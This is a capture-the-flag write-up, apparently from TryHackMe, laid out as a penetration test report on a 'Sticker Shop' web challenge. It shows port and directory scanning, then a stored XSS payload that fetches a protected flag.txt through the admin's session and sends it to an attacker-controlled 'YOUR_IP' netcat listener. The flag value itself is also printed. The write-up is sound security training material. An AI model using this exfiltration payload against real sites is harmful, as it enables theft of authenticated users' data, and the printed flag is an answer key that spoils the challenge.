Penetration Testing Report – Sticker Shop Challenge

## 🛡️ Penetration Testing Report – Sticker Shop Challenge **Target IP:** `10.10.110.114` **Goal:** Retrieve the flag located at `http://10.10.110.114:8080/flag.txt` --- ### 1. Initial Reconnaissance #### Accessing Web Server via Browser: - Attempted direct access to the IP via browser. - **Response:** `Error 405 - Specified method is invalid for this resource.` Indicates the server is up, but the HTTP method used (likely GET) is not allowed. --- ### 2. Port Scanning ```bash nmap -v 10.10.110.114 ``` **Results:** ``` PORT STATE SERVICE 22/tcp open ssh 8080/tcp open http-proxy MAC Address: 02:F3:3C:7E:26:BF (Unknown) ``` --- ### 3. Hidden Directory Discovery ```bash gobuster dir -u http://10.10.110.114:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 ``` **Findings:** - `/view_feedback` → **Status 401 Unauthorized** #### Manual Attempts: - Accessing `http://10.10.110.114:8080/view_feedback` → **401 Unauthorized** - `view-source` inspection → No useful information - Accessing `http://10.10.110.114:8080/flag.txt` → **401 Unauthorized** - `view-source` inspection → No output --- ### 4. Web Application Investigation - Visited the main page: `http://10.10.110.114:8080` - Found a **feedback submission form** - Observed that the input field allows special characters (e.g., `<`, `>`), indicating potential for **XSS injection**. --- ### 5. XSS Payload Testing #### 5.1 Inspecting the POST structure: ```json "feedback": "<script>alert('Sensitive+To+XSS')</script>+" ``` #### 5.2 Testing payload with window.open: ```bash curl -X POST http://10.10.110.114:8080/submit_feedback \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "feedback=<script>window.open('/view_feedback')</script>" ``` - Result: Response was a valid HTML page (`<!DOCTYPE html>`) ✅ Confirms the script is rendered — meaning **admin opening the feedback would trigger the payload** --- ### 6. Exploiting XSS to Access Protected Resource (flag.txt) #### Objective: Exfiltrate contents of `flag.txt` (401-protected) by abusing authenticated user's privileges (e.g., admin reading the feedback) #### Steps: ##### 6.1 Setup a Listener using Netcat: ```bash nc -lvnp 8080 ``` > Output: > `Listening on 0.0.0.0 8080` ##### 6.2 Injecting Malicious Feedback Payload (XSS): ```bash curl -X POST http://10.10.110.114:8080/submit_feedback \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "feedback=<script>fetch('/flag.txt').then(r => r.text()).then(d => {fetch('http://YOUR_IP:8080/?flag=' + btoa(d));});</script>" ``` > ✅ Feedback submission confirmed (HTML response returned) ##### 6.3 Capturing the Flag: > Output on netcat listener: ``` Connection received on 10.10.226.39 41714 GET /?flag=VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9 HTTP/1.1 ``` ##### 6.4 Decoding Flag (Base64): Use [https://www.base64decode.org/](https://www.base64decode.org/) > Encoded flag: > `VEhNezgzNzg5YTY5MDc0ZjYzNmY2NGEzODg3OWNmY2FiZThiNjIzMDVlZTZ9` > ✅ Decoded flag: ```text THM{83789a69074f636f64a38879cfcabe8b62305ee6} ``` --- ### ✅ Conclusion - Successfully bypassed access control via **stored XSS**. - Extracted sensitive data (`flag.txt`) by leveraging the **admin’s session**. - Identified severe vulnerability due to **lack of input sanitization** and **authenticated content exposure**.